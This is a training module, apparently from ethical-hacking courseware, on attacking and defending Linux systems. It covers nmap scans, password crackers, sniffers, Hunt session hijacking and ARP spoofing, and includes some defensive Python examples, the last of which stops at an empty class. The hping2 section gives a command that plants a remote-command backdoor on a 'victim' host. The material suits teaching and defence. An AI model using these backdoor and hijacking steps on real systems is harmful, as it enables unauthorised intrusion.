Module Objectives


In this module we will be looking at hacking Linux systems. Linux is fast emerging as an affordable and widely available operating system. As its popularity grows, so does the attention of players with malicious intent who want to break into these systems. Therefore we intend to discuss various aspects of hacking Linux systems in this module. By the completion of this module, you will be familiar with the following aspects:

  • Why Linux?

  • Compiling Programs in Linux

  • Scanning Networks and Mapping Networks

  • Password Cracking in Linux

  • SARA

  • TARA

  • Sniffing

  • A Pinger in disguise

  • Session Hijacking

  • Linux Rootkits

  • IP Chains and IP Tables

  • Linux Security Countermeasures

start sidebar
Why Linux?
  • Majority of servers around the globe are running on Linux / Unix-like platforms

  • Easy to get and Easy on pocket

  • There are many types of Linux (distributions / distros / flavors) such as Red Hat, Mandrake, Yellow Dog, Debian, etc.

  • Source code is available

  • Easy to modify.

  • Easy to develop a program on Linux.

end sidebar
 

Linux is an operating system that can be downloaded free and "belongs" to an entire community of developers, not one corporate entity. With more and more people looking for an alternative to Windows, Linux has recently grown in popularity and is quickly becoming a favorite among major corporations and curious desktop users. Not only does it give users a choice of operating systems, it also proves itself valuable with its power, flexibility, and reliability.

Linux supports most of the major protocols, and quite a few of the minor ones. Support for Internet, Novell, Windows, and Appletalk networking has been part of the Linux kernel for some time now. With support for Simple Network Management Protocol and other services (such as Domain Name Service), Linux is also well suited to serving large networks. Since Linux was developed by a team of programmers over the Internet, its networking features were given high priority. Linux is capable of acting as client and/or server to any of the popular operating systems in use today, and is quite capable of being used to run Internet Service Providers.

Linux is an implementation of the UNIX design philosophy, which means that it is a multi-user system. This has numerous advantages, even for a system where only one or two people will be using it. Security, which is necessary for protection of sensitive information, is built into Linux at selectable levels. More importantly, the system is designed to multi-task. Whether one user is running several programs or several users are running one program, Linux is capable of managing the traffic.

Another huge advantage of an open system is a large number of software authors and beta testers. This makes the software testing and refinement process faster and better. Because there is not a lot of commercial software for Linux, most software written for Linux is written because the authors want to do it and there need be no compromise of quality.

Linux is "Free" in two senses. In one sense, the Linux consumer is free to modify the system and do anything he or she wishes with it. In another sense, acquiring Linux does not necessarily require any cash outlay at all.

There are two very popular methods for acquiring and distributing Linux: FTP and CD-ROM. Most of the major Linux distributions (Red Hat, Debian, Slackware, Caldera) are available for free download from several popular sites. Though time consuming, it does not cost anything beyond connection charges.

Linux is one of the more stable operating systems available today. This is due in large part to the fact that Linux was written by programmers who were writing for other programmers and not for the corporate system. There are currently two mature program packaging standards in the Linux world - SuSE and Mandrake. Debian and Red Hat each have their own packaging systems; both will check dependencies, both can upgrade an entire running system without a reboot. This makes it easy to upgrade parts or all of a system, as well as add new software, or remove unwanted software.

start sidebar
Compiling Programs in Linux
  • There are generally 3 steps to compiling programs under Linux.

    1. Configuring how the program will be compiled

    2. Compiling the program

    3. Installing the program

       $ ./configure
       $ make
       $ su
       Password:
       # make install
       # exit
end sidebar
 

The fact that Linux is an open source operating system means that there are continuous efforts to improve the system. Therefore if a user downloads a file (which happens more often than not) to add functionality to his system, he will have to compile it on his system. The following is a brief look at how this process takes place. It helps to remember that most Linux programs are beta at best and can and will contain errors or bugs. However, the percentage of programs that compile without problems has increased significantly recently.

Note  

Usually the download is some sort of tarball on the user's disk. The first step towards compilation is to uncompress it and untar it to a directory. By convention, most users untar programs to the directory: /usr/src. This helps in maintaining version history and cleaning up after. The Linux tar program can uncompress and untar a file at the same time if the file is compressed using gzip. That means the user needs to just cd to the /usr/src directory and type:

 tar -xzvf /{path to file}/{filename.tar.gz} [Enter] 

and it will uncompress and untar. A quick explanation of the flags:

  • x - untar the file

  • z - uncompress the file

  • v - verbose; list each file as it is extracted

  • f - What follows is the file the user wants to untar

For compiling, the user issues the "make" command. In order for "make" to start compiling, it must have a file named: Makefile.

There are three common ways to start the compile: simple, Imake, and configure.

Simple compile: If there is a file called Makefile and no Imakefile or configure file, this method is used to compile the program. This method has the most problems because nothing is configured for the particular computer.

 make [Enter]
 make install [Enter] 

and if all goes well, the program can be run.

Imake: This is an older way to compile. If, on listing the directory, there is an Imakefile and no Makefile, this method is used.

 xmkmf [Enter]
 make [Enter]
 make install [Enter] 

Configure: this method of compiling is used if there is a file named configure in the directory. This is the easiest way to compile and probably has the highest chance of compiling correctly. Essentially it checks the entire system for every library and support file the program needs, and then creates the Makefiles with the correct information. To compile, type:

 ./configure [Enter]
 make [Enter]
 make install [Enter] 

The most common cause of a failed compile is missing files. Almost all programs rely on support programs, files or libraries; if they are missing, the program cannot compile. The wrong version of a library breaks the build just as surely as not having it at all. The next most common problem is missing include files. Sometimes having multiple versions of the same library can cause problems, as each version may put its header files in a different place.
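The three build methods above, as an added example that is not part of the module or of any project's build scripts: a Python script that unpacks a .tar.gz the way the text describes, picks the build method from the files present, and first refuses archives whose member names would extract outside the source directory (a check worth doing before "make install" runs as root). The archives it uses are constructed in a temporary directory and nothing is compiled.

```python
"""Unpack a source tarball and pick the build method (configure / Imake / simple).

Added example for this module, not any project's build code.  The sample
archives are constructed in a temporary directory; no build is run.
"""
import io
import os
import posixpath
import tarfile
import tempfile

# Command sequence for each of the three methods in the text; su -c replaces
# the interactive su / make install / exit sequence.
BUILD_STEPS = {
    "configure": ["./configure", "make", "su -c 'make install'"],
    "imake": ["xmkmf", "make", "su -c 'make install'"],
    "simple": ["make", "su -c 'make install'"],
}


def _escapes(path):
    """True if a member path is absolute or climbs out of the tree with '..'."""
    return path.startswith("/") or ".." in posixpath.normpath(path).split("/")


def unsafe_members(tar):
    """Member names that would be written outside the extraction directory."""
    bad = []
    for m in tar.getmembers():
        target = None
        if m.issym():    # symlink target is relative to the member's directory
            target = posixpath.join(posixpath.dirname(m.name), m.linkname)
        elif m.islnk():  # hard link target is archive-relative
            target = m.linkname
        if _escapes(m.name) or (target is not None and _escapes(target)):
            bad.append(m.name)
    return bad


def safe_untar(archive, dest_dir):
    """'cd dest_dir; tar -xzvf archive' with the path check done first.

    Returns the top-level directories that were created, e.g. dest_dir/prog-1.0.
    """
    with tarfile.open(archive, "r:gz") as tar:
        bad = unsafe_members(tar)
        if bad:
            raise ValueError("refusing archive with unsafe members: %s" % bad)
        os.makedirs(dest_dir, exist_ok=True)
        try:
            tar.extractall(dest_dir, filter="data")  # Python >= 3.12 safety filter
        except TypeError:
            tar.extractall(dest_dir)                 # older Python: checked above
        tops = sorted({m.name.split("/")[0] for m in tar.getmembers()})
    return [os.path.join(dest_dir, t) for t in tops]


def detect_build_method(src_dir):
    """The text's rule: configure, else Imakefile without Makefile, else Makefile."""
    def has(name):
        return os.path.isfile(os.path.join(src_dir, name))
    if has("configure"):
        return "configure"
    if has("Imakefile") and not has("Makefile"):
        return "imake"
    if has("Makefile"):
        return "simple"
    return None


def build_plan(src_dir):
    """Return (method, commands) for an unpacked source directory."""
    method = detect_build_method(src_dir)
    if method is None:
        raise FileNotFoundError("no configure, Imakefile or Makefile in %s" % src_dir)
    return method, BUILD_STEPS[method]


def make_sample_tarball(path, names):
    """Write a .tar.gz of empty files with the given member names (constructed)."""
    with tarfile.open(path, "w:gz") as tar:
        for name in names:
            info = tarfile.TarInfo(name)
            info.size = 0
            tar.addfile(info, io.BytesIO(b""))


def run_demo():
    """Unpack a well-formed archive, reject a traversal archive, return results."""
    work = tempfile.mkdtemp(prefix="usr_src_")
    good = os.path.join(work, "prog-1.0.tar.gz")
    make_sample_tarball(good, ["prog-1.0/configure", "prog-1.0/Makefile.in"])
    src = safe_untar(good, os.path.join(work, "src"))[0]
    method, steps = build_plan(src)
    bad = os.path.join(work, "bad.tar.gz")   # one member climbs out with '..'
    make_sample_tarball(bad, ["prog-1.0/configure", "../../etc/evil"])
    try:
        safe_untar(bad, os.path.join(work, "src2"))
        rejected = False
    except ValueError:
        rejected = True
    return {"unpacked": os.path.basename(src), "method": method, "steps": steps,
            "rejected": rejected,
            "src2_created": os.path.isdir(os.path.join(work, "src2"))}
```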

start sidebar
Scanning Networks
  • Once the IP address of a target system is known, an attacker can begin the process of port scanning, looking for holes in the system through which the attacker can gain access.

  • A typical system has 2^16 - 1 port numbers, with one TCP port and one UDP port for each number.

  • Each one of these ports is a potential way into the system.

  • The most popular Scanning tool for Linux is Nmap.

end sidebar
 
Note  

Scanning is the art of finding machines on a network and testing them to see what ports are listening. Scanning networks and hosts is the first method a cracker will use before launching an attack.

Tools  

Two interesting tools on Linux are Fping and Nmap. Fping sends multiple ICMP echo request packets simultaneously and processes the replies as they arrive. This makes ping sweeps faster. Fping can be given a single IP address or a list of IP addresses in a file.

Scanning helps one to know what services are running on a machine. This will show the open ports on which services are listening for connections. Once the targets are identified, an intruder is able to scan for listening ports.

Port scanning is the process of connecting to TCP and UDP ports on the target system to determine what services are running or in a listening state. Identifying listening ports is essential to determine the type of operating system and application in use on the system.

Types of port scanning:

  1. TCP connect scan: This type of scan connects to the target port and completes a full three-way handshake (SYN, SYN/ACK and ACK).

  2. TCP SYN scan: This is also called half-open scanning because it does not complete the three-way handshake. Instead, a SYN packet is sent; if a SYN/ACK packet comes back, the target machine's port is in a listening state, and if an RST/ACK packet is received, the port is not listening.

  3. TCP FIN scan: This technique sends a FIN packet to the target port and based on RFC 793 the target system should send back an RST for all closed ports.

  4. TCP Xmas Tree scan: This technique sends a FIN, URG and PUSH packet to the target port and based on RFC 793 the target system should send back an RST for all closed ports.

  5. TCP Null scan: This technique turns off all flags and based on RFC 793, the target system should send back an RST for all closed ports.

  6. TCP ACK scan: This technique is used to map out firewall rule sets. It can help determine if the firewall is a simple packet filter allowing only established connections or a stateful firewall performing advanced packet filtering.

  7. TCP Window scan: This type of scan can detect both filtered and non-filtered ports on some systems due to an anomaly in the way the TCP window size is reported.

  8. TCP RPC scan: This technique is specific to UNIX systems and is used to detect and identify Remote Procedure Call (RPC) ports and their associated program and version number.

  9. UDP scan: This technique sends a UDP packet to the target port. If the target port responds with an "ICMP port unreachable" message, the port is closed; if not, the port is assumed open. This is a slow process since UDP is a connectionless protocol, and the accuracy of this technique depends on many factors related to the utilization of network and system resources.

start sidebar
Hacking Tool: Nmap

http://www.insecure.org/nmap

  • Stealth Scan, TCP SYN

     nmap -v -sS 192.168.0.0/24 
  • UDP Scan

     nmap -v -sU 192.168.0.0/24 
  • Stealth Scan, No Ping

     nmap -v -sS -P0 192.168.0.0/24 
  • Fingerprint

     nmap -v -O 192.168.0.0/24 #TCP 
end sidebar
 
Tools  

Nmap is covered under the GNU General Public License (GPL) and can be downloaded free of charge from http://www.insecure.org/nmap. It comes as tarred source as well as in RPM format. The usage syntax of Nmap is fairly simple. The main options to nmap on the command line are the different types of scans, which are specified with the -s flag. A ping scan, for example, is "-sP". Options are specified first, followed by the hosts or networks to be targeted. Nmap's functionality is greatly increased when run as root.

Nmap is flexible in specifying targets. The user can scan one host or scan entire networks by pointing Nmap to the network address with a "/mask" appended to it. Targeting "victim/24" will target the Class C network, whereas "victim/16" will target the Class B. Nmap also allows the user to specify networks with wild cards, as in 192.168.7.*, which is the same as 192.168.7.0/24, or 192.168.7.1,4,5-16 to scan the selected hosts on that subnet.

Users are able to sweep entire networks looking for targets with Nmap. This is usually done with a ping scan by using the "-sP" flag. A TCP "ping" will send an ACK to each machine on a target network. Machines that are alive on the network will respond with a TCP RST. To use the TCP "ping" option with a ping scan, the "-PT" flag is included, specifying the port to probe on the target network.

Nmap has been covered in detail in module three and readers are advised to refer to that to learn more about the OS fingerprinting and other scan options.

start sidebar
Scanning Networks
  • One essential type of tool for any attacker or defender is the vulnerability scanner.

  • These tools allow the attacker to connect to a target system and check for vulnerabilities such as configuration errors, default configuration settings that allow attackers access, and the most recently reported system vulnerabilities.

  • The preferred open-source tool for this is Nessus.

  • Nessus is an extremely powerful network scanner. It can also be configured to run a variety of attacks.

end sidebar
 

The 'Nessus' Project was started in early 1998, and first released in April 1998. The "Nessus" Project provides to the internet community a free, powerful, up-to-date and easy to use remote security scanner. Nessus allows the user to audit remotely a given network and determine whether attackers may break into it, or misuse it in some way.

Tools  

Nessus Security Scanner's architecture is a little different from the other scanners as it uses a client/server model. This allows a central server to do all the scanning while results are monitored and reviewed on distributed administrative clients. The scanning engine is Unix-based, while the administrative consoles can be run under Windows or Unix X Windows. Nessus Security Scanner supports command-line interaction as well. Not only is Nessus Security Scanner open source, but the architecture for creating vulnerability checks is quite open as well.

There is also a multi-platform client written in Java. All communication between client and server is encrypted. The current Nessus database contains signatures for, and is therefore able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly-used web CGI scripts; additionally, the Nessus database detects DDoS zombies and Trojans. To scan hosts for vulnerabilities, install client and server, create a new server user, and connect. Problem reports generated by Nessus are easy to read and are exportable to other software.

Unlike many other security scanners, Nessus does not take anything for granted. That is, it will not assume that a given service is running on a fixed port. It will also not decide that a security vulnerability is present merely by looking at the version number of the remote service, but will really try to exploit it. Plugins are the core of Nessus because they contain a set of scripts to check for vulnerabilities in a network, e.g., backdoors, DoS, wide-open ports, etc. These scripts are written in the language called NASL (Nessus Attack Scripting Language) and can be found in /usr/local/lib/nessus/plugin. The user can also develop their own scripts.

start sidebar
Cheops
end sidebar
 
Tools  

Cheops (KEE-ops) is a Network management tool for mapping and monitoring the network. It has host/network discovery functionality as well as OS detection of hosts.

Cheops is an Open Source Network User Interface. It is designed to be the network equivalent of a Swiss-army knife, unifying your network utilities. Cheops does for the network what a file manager does for the file system.

Cheops can optionally determine the OS of hosts on the network, selecting appropriate icons for them. Cheops can show the routes taken to access areas of the network. This feature is designed for larger networks, with routers, subnets, etc. This mapping not only makes hierarchy clearer, but can show unusual routing issues.

Cheops includes a generalized TCP port scanner to see what ports on the network are in use. It can be used to retrieve version information for certain services, to be sure any given host is up-to-date with the latest revision of its services.

Cheops includes a simple integrated SNMP browser, including write capability, using the UCD SNMP library. Cheops also supports a plug-in interface, which includes support for SNMP plug-ins, similar in concept to those of HP Openview.

Cheops can monitor critical servers, and immediately notify the concerned person through its event log, standard e-mail, and soon via paging, when things go wrong. The network administrator can know exactly which system is up or down, and just when problems occur. Right clicking on a host quickly shows a list of common services it supports, and rapid, easy access to them.

start sidebar
Port scan detection tools
  • Scanlogd - detects and logs TCP port scans. http://www.openwall.com/scanlogd/

    Scanlogd only logs port scans. It does not prevent them. You will only receive summarized information in the system's log.

  • Abacus Portsentry http://www.psionic.com/abacus/portsentry/

    Portscan detection daemon Portsentry has the ability to detect port scans (including stealth scans) on the network interfaces of your server. Upon alarm it can block the attacker via hosts.deny, dropped route or firewall rule.

end sidebar
 
Tools  

PortSentry is part of the Abacus Project suite of tools. The Abacus Project is an initiative to release low-maintenance, generic, and reliable host based intrusion detection software to the Internet community. More information can be obtained from http://www.psionic.com.

PortSentry has a number of options to detect port scans, when it finds one it can react in the following ways:

  • A log indicating the incident is made via syslog()

  • The target host is automatically dropped into /etc/hosts.deny for TCP Wrappers

  • The local host is automatically re-configured to route all traffic to the target to a dead host to make the target system disappear.

  • The local host is automatically re-configured to drop all packets from the target via a local packet filter

PortSentry has four "stealth" scan detection modes. Method one uses a pre-defined list of ports to watch over; if someone pokes at them, it activates. The second method is what I call "inverse" port binding, where every port under a range is watched *except* for those that the system has bound for network daemons when PortSentry starts or ones that you have manually excluded. This is a very sensitive way of looking for port probes, but also the most prone to false alarms.

scanlogd is a TCP port scan detection tool, originally designed to illustrate various attacks an IDS developer has to deal with. Scanlogd detects port scans and writes one line per scan via the syslog(3) mechanism. If a source address sends multiple packets to different ports in a short time, the event will be logged. The format of the messages is:

saddr[:sport] to daddr [and others,] ports port[, port...], flags[, TOS TOS][, TTL TTL] @HH:MM:SS

The fields in square brackets are optional; sport, TOS, and TTL will only be displayed if they were constant during the scan. The flags field represents the TCP control bits seen in packets coming to the system from the address of the scan. It is a combination of eight characters, each corresponding to one of the six defined and two reserved TCP control bits. Control bits that were always set are encoded with an uppercase letter, and a lowercase letter is used if the bit was always clear. A question mark is used to indicate bits that changed from packet to packet.

Scanlogd needs a way to obtain raw IP packets that either come to the system scanlogd is running on, or travel across a network segment that is directly connected to the system. Current versions of scanlogd can be built with support for one of several packet capture interfaces. As of version 2.0, scanlogd is aware of the raw socket interface on Linux, libnids, and libpcap. The use of libpcap alone is discouraged.
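The scan types listed earlier and the scanlogd message format just described, worked together as an added example that is not scanlogd's own code: a parser for scanlogd syslog lines that decodes the eight-character flags field and maps it onto the scan types from this module. The letter order f s r p a u x y (FIN, SYN, RST, PSH, ACK, URG, then the two reserved bits) is an assumption, and the log lines are constructed with documentation addresses, not a real capture.

```python
"""Parse scanlogd syslog lines and name the scan type from the flags field.

Added example for this module (not scanlogd's code).  Assumed: the eight flag
letters are in the order f s r p a u x y.  The sample lines are constructed.
"""
import re

# Position -> TCP control bit, in the assumed letter order "fsrpauxy".
FLAG_NAMES = ("FIN", "SYN", "RST", "PSH", "ACK", "URG", "RES1", "RES2")

# One message:  saddr[:sport] to daddr [and others,] ports p[, p...],
# flags[, TOS tos][, TTL ttl] @HH:MM:SS   (a syslog prefix may precede it).
LINE_RE = re.compile(
    r"(?P<saddr>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<sport>\d+))?"
    r" to (?P<daddr>\d{1,3}(?:\.\d{1,3}){3})(?P<others> and others,)?"
    r" ports (?P<ports>\d+(?:, \d+)*(?:, \.\.\.)?)"
    r", (?P<flags>[fsrpauxyFSRPAUXY?]{8})"
    r"(?:, TOS (?P<tos>[0-9a-fA-F]+))?(?:, TTL (?P<ttl>\d+))?"
    r" @(?P<time>\d\d:\d\d:\d\d)\s*$"
)


def decode_flags(flags):
    """Return (always_set, always_clear, varied) sets of TCP bit names."""
    always_set, always_clear, varied = set(), set(), set()
    for ch, name in zip(flags, FLAG_NAMES):
        if ch == "?":
            varied.add(name)          # bit changed from packet to packet
        elif ch.isupper():
            always_set.add(name)      # bit set in every packet
        else:
            always_clear.add(name)    # bit clear in every packet
    return always_set, always_clear, varied


def classify_scan(flags):
    """Map the flags field onto the scan types listed in this module."""
    always_set, _, varied = decode_flags(flags)
    defined = {"FIN", "SYN", "RST", "PSH", "ACK", "URG"}
    if varied & defined:
        # A full connect scan sends SYN, then ACK, to each port, so those bits
        # differ between packets and show up as '?'.
        return "mixed flags (connect scan or several scans)"
    core = always_set & defined
    if core == {"SYN"}:
        return "TCP SYN (half-open) scan"
    if core == {"FIN"}:
        return "TCP FIN scan"
    if core == {"FIN", "PSH", "URG"}:
        return "TCP Xmas Tree scan"
    if not core:
        return "TCP Null scan"
    if core == {"ACK"}:
        return "TCP ACK scan (firewall rule mapping)"
    return "other flag combination: " + ",".join(sorted(core))


def parse_line(line):
    """Parse one line; return a dict, or None if it is not a scanlogd message."""
    m = LINE_RE.search(line)
    if not m:
        return None
    fields = m.group("ports").split(", ")
    return {
        "saddr": m.group("saddr"),
        "sport": int(m.group("sport")) if m.group("sport") else None,
        "daddr": m.group("daddr"),
        "other_targets": m.group("others") is not None,
        "ports": [int(p) for p in fields if p != "..."],
        "ports_truncated": fields[-1] == "...",
        "flags": m.group("flags"),
        "tos": m.group("tos"),
        "ttl": int(m.group("ttl")) if m.group("ttl") else None,
        "time": m.group("time"),
        "scan_type": classify_scan(m.group("flags")),
    }


def summarize(log_text):
    """Parse every line of a syslog excerpt; return the scanlogd events in order."""
    return [ev for ev in map(parse_line, log_text.splitlines()) if ev]


# Constructed sample lines (RFC 5737 documentation addresses), not real logs.
SAMPLE_LOG = """\
Mar  3 03:14:15 gw scanlogd: 192.0.2.10:40000 to 198.51.100.5 ports 21, 22, 23, 25, 80, 110, 143, 443, fSrpauxy, TOS 00, TTL 64 @03:14:15
Mar  3 03:15:02 gw scanlogd: 192.0.2.10 to 198.51.100.5 and others, ports 22, 80, 443, FsrPaUxy @03:15:02
Mar  3 03:15:40 gw scanlogd: 192.0.2.77 to 198.51.100.9 ports 1, 2, 3, 4, 5, 6, 7, ..., fsrpauxy, TTL 255 @03:15:40
Mar  3 03:16:11 gw scanlogd: 192.0.2.10 to 198.51.100.5 ports 21, 22, 23, 80, f?rp?uxy @03:16:11
Mar  3 03:16:12 gw sshd[412]: Accepted publickey for ops from 192.0.2.50 port 51022
"""
```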

start sidebar
Password Cracking in Linux
  • Xcrack

    (http://packetstorm.linuxsecurity.com/Crackers/)

  • Xcrack doesn't do much with rules.

  • It will find any passwords that match words in the dictionary file the user provides, but it won't apply any combinations or modifications of those words.

  • It is a comparatively fast tool.

end sidebar
 
Tools  

Xcrack (http://packetstorm.linuxsecurity.com/Crackers/)

Xcrack is a simple dictionary-based password cracking tool. It will find any passwords that match words in the dictionary file the user provides. It does not generate permutations or combinations of the words in the dictionary to arrive at the right password. For this reason it is a comparatively faster tool, though its efficacy may be lower.

start sidebar
Hacking Tool: John the Ripper

http://www.openwall.com/john/

  • John the Ripper requires the user to have a copy of the password file.

  • This is a relatively fast password cracker, and the most popular amongst the hacker community.

Cracking times, using the default dictionaries that come with the Linux system are as follows:

User ecc with password eccecc took less than a second

User root with password doodle took less than 2 seconds.

end sidebar
 
Tools  

John the Ripper is a password cracker, available for many flavors of UNIX (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak passwords. Besides several crypt password hash types most commonly found on various UNIX flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.

start sidebar
SARA (Security Auditor's Research Assistant)

http://www-arc.com/sara

  • The Security Auditor's Research Assistant (SARA) is a third generation Unix-based security analysis tool that supports the FBI Top 20 Consensus on Security.

  • SARA operates on most Unix-type platforms including Linux & Mac OS X

  • SARA is the upgrade of SATAN tool.

  • Getting SARA up and running is a straightforward compilation process, and the rest is done via a browser.

end sidebar
 
Tools  

SARA (Security Auditor's Research Assistant), a derivative of the Security Administrator Tool for Analyzing Networks (SATAN), remotely probes systems via the network and stores its findings in a database. The results can be viewed with any Level 2 HTML browser that supports the HTTP protocol.

When no primary_target(s) are specified on the command line, SARA starts up in interactive mode and takes commands from the HTML user interface.

When primary_target(s) are specified on the command line, SARA collects data from the named hosts, and, possibly, from hosts that it discovers while probing a primary host. A primary target can be a host name, a host address, or a network number. In the latter case, SARA collects data from each host in the named network.

SARA can generate reports of hosts by type, service, and vulnerability by trust relationship. In addition, it offers tutorials that explain the nature of vulnerabilities and how they can be eliminated.

By default, the behavior of SARA is controlled by a configuration file (config/sara.cf). The defaults can be overruled via command-line options or via buttons etc. in the HTML user interface.

start sidebar
Sniffit
  • http://reptile.rug.ac.be/~coder/sniffit/sniffit.html

  • Sniffit is one of the most famous and fastest Ethernet sniffers for Linux.

  • You can run it either on the command line with optional plug-ins and filters or in interactive mode, which is the preferred mode.

  • The interactive mode of Sniffit allows you to monitor connections in real-time and therefore sniff real-time too!

Note  

Remember to download the patch and then recompile Sniffit, for optimum results!

end sidebar
 
Tools  

Sniffit runs on Linux, SunOS, Solaris, FreeBSD and IRIX. The main reason to use Sniffit over other packet sniffers is the way that it captures the data transferred within sessions. This could be useful, for example, when capturing text-based protocols like HTTP, FTP, and SMTP.

Sniffit can be run either on the command line with optional plug-ins and filters or in interactive mode, which is the preferred mode. The interactive mode of Sniffit allows monitoring connections in real-time.

Sniffers can only be run by root, and they can only log packets that 'travel' on their own Ethernet segment. Working with '-d' or '-a' gives raw packets, still wrapped in their IP headers; when logging to files, only the data sent is logged and the packets are 'unwrapped'.

start sidebar
Hacking Tool: HPing2

http://www.hping.org

  • Hping is a command-line oriented TCP/IP packet assembly/analyzer.

  • More commonly known for its use as a pinging utility, HPing carries a hidden but handy usage, that is a Backdoor Trojan.

  • Just enter the following command on your victim

     $ ./hping2 -I eth0 -9ecc  /bin/sh 

    Then Telnet into any port of your victim and invoke commands remotely on your victim's host by preceding any Unix/Linux commands with ecc

    $ telnet victim.com 80

    $ eccecho This Text imitates a trojan shovel

end sidebar
 
Tools  

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface expands the functionality of a common "ping" program (used to test whether hosts are online), but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, and has the ability to send files over a covert channel with custom-crafted TCP, ICMP and other Internet protocol packets. Crafting packets will allow an attacker to probe firewall rule-sets and find entry points into the targeted system or network. hping will run on any Linux distro, as well as Net/Free/OpenBSD systems, and it will run on Solaris as well. It is used to test both hosts and firewalls. hping2 can handle fragmentation and arbitrary packet body and size, and can be used to transfer files encapsulated in the supported protocols. Using hping2 the user can:

  • Test firewall rules

  • Advanced port scanning

  • Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.

  • Path MTU discovery

  • Transferring files between even really fascist firewall rules.

  • Traceroute-like under different protocols.

  • Firewalk-like usage.

  • Remote OS fingerprinting.

  • TCP/IP stack auditing.

start sidebar
Session Hijacking
  • Using a combination of sniffing and spoofing techniques, session hijacking tools allow an attacker to steal a valid, established login session.

  • Examples of such sessions are Telnet and FTP sessions. With a successful session hijacking attempt, the victim's login session vanishes and he usually attributes it to network problems and logs in again.

  • There are generally two types of Session Hijacking Techniques:

    1. Host-Based Session Hijacking

    2. Network-Based Session Hijacking

end sidebar
 
Note  

Many systems have statistical weaknesses in the methods that are used to generate TCP/IP initial sequence numbers, possibly allowing an attacker to hijack or close TCP/IP sessions. Using a combination of sniffing and spoofing techniques, session hijacking tools allow an attacker to steal a valid, established login session. Examples of such sessions are Telnet and FTP sessions. With a successful session hijacking attempt, the victim's login session vanishes and he usually attributes it to network problems and logs in again.

If attackers know the TCP/IP initial sequence number and the amount of traffic that has been sent, they may be able to close the TCP/IP session, hijack it, or inject arbitrary data. In this type of attack, it is not necessary for the attacker to know the next sequence number. They can send a flood of packets that contain likely sequence numbers so that the one packet containing the correct number will be accepted. If the set of possible sequence numbers is small enough, it becomes practical for an attacker to send packets set with all possible sequence numbers. The larger the available bandwidth of a system, the larger the set of packets can be.

To protect against these types of attacks, many operating systems use pseudo-random number generators to choose the TCP/IP initial sequence number for the TCP/IP session. However, many of these pseudo-random number generators are statistically weak and make sequence number-based attacks not just possible, but practical.

Host-Based Session Hijacking requires the attacker to have root on either the source or the destination machine. On a Linux system, the attacker uses a tool to interact with the local terminal devices (ttys) that are used in telnet sessions. If the attacker has root, he will be able to read all session data from the target's tty and place keystrokes into it. This is rarely used, as it requires the attacker to obtain root access on either machine.

Network-Based Session Hijacking uses sniffing on a segment of the network carrying the traffic passing from the source to the destination, monitoring the packets and their TCP sequence numbers. When the attacker decides to hijack a session, he inserts traffic into the network with the source IP of the actual source instead of his own IP, placing the correct TCP sequence numbers on the packets.

This prompts the destination machine to believe that the traffic came from the legitimate source, and it follows the commands; the attacker has hijacked the session. Note: Use of strong authentication cannot protect against a successful session hijacking, whereas encrypting the conversation offers some protection.

Session hijacking has been described in detail in the earlier modules. While the essence is the same, we will explore the various tools available to an attacker to do this in a Linux environment. Readers are advised to refresh the contextual information from the previous modules.

start sidebar
Hacking Tool: Hunt

http://lin.fsid.cvut.cz/~kra/index.html

  • One of Hunt's advantages over other session hijacking tools is that it uses techniques to avoid ACK storms.

  • Hunt avoids this ACK storm and the dropping of the connection by using ARP spoofing to establish the attacker's machine as a relay between Source and Destination.

  • Now the Attacker uses Hunt to sniff the packets the Source and Destination send over this connection. The Attacker can choose to act as a relay and forward these packets to their intended destinations, or he can hijack the session.

  • The attacker can type in commands that are forwarded to Destination but which the Source can't see. Any commands the Source types in can be seen on the Attacker's screen, but they are not sent to Destination. Then Hunt allows the attacker to restore the connection back to the Source when he/she is done with it.

end sidebar
 
Tools  

A sniffer is a program or device that eavesdrops on network traffic and grabs information traveling over the network. Sniffers are basically data interception programs. A sniffer is usually passive: it only collects data. Hence, it becomes extremely difficult to detect sniffers. When installed on a computer, though, a sniffer will generate some small amount of traffic, and is therefore detectable. The best way to secure against sniffing is to use encryption. According to Pavel Krauz, the main goal of the Hunt project is to develop tools for exploiting well-known weaknesses in the TCP/IP protocol suite.

Hunt is considered by security professionals to be one of the best session hijacking tools available, as it is well written and has a comprehensive feature set. Hunt does not have the graphical interface of similar tools such as IPWatcher and T-sight, but the text-based user interface is fairly easy to use and has the benefit of enabling Hunt to be used over a telnet session.

Hunt was developed by Pavel Krauz. Hunt's hijacking capabilities are primarily aimed at telnet and rlogin traffic and enable an attacker to view active sessions on an Ethernet LAN and then select one of them to hijack. Hunt is a program for intruding into a connection, watching it and resetting it. Note that Hunt operates on Ethernet and is best used for connections which can be watched through it. However, it is possible to do something even for hosts on another segment or hosts that are on switched ports.

ARP spoofing with Hunt

ARP enables systems to map IP addresses to the machine's physical addresses. ARP maps IP addresses to MAC addresses for systems connected to Ethernet LANs. Consider an illustrative scenario where Alice wants to send data to Bob.

Normally, if the ARP program on Alice finds a mapping for Bob's IP address in the ARP cache, it will allow Alice to address the data with Bob's MAC address and send it to him. Otherwise, the ARP program on Alice will send out an ARP request to all machines on the Ethernet segment. When Bob answers, Alice will send her data to Bob and will store Bob's MAC address in her ARP cache.

Sometimes it is possible for a machine to send out an ARP reply without an explicit ARP request. Usually, most systems accept this forged answer and update their ARP cache to accommodate it. This weakness allows ARP spoofing to take place.
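As an added example (not part of the original text or of Hunt), the following Python monitor flags the two symptoms of ARP cache poisoning just described: a reply that answers no recent request, and an IP address whose MAC binding changes. The packet records and addresses are constructed here, not captured.

```python
"""Detect ARP cache poisoning from a stream of ARP packets.

Added example, not from the original text. The checks implement the two
symptoms described above: an unsolicited (gratuitous) reply, and an IP
address whose MAC binding changes. Input records are constructed.
"""
from collections import namedtuple

ARP_REQUEST = 1
ARP_REPLY = 2

# One ARP packet: when it was seen, what it claims, and whom it is aimed at.
ArpPacket = namedtuple("ArpPacket", "t op sender_ip sender_mac target_ip")


class ArpMonitor:
    """Tracks IP->MAC bindings and outstanding who-has requests."""

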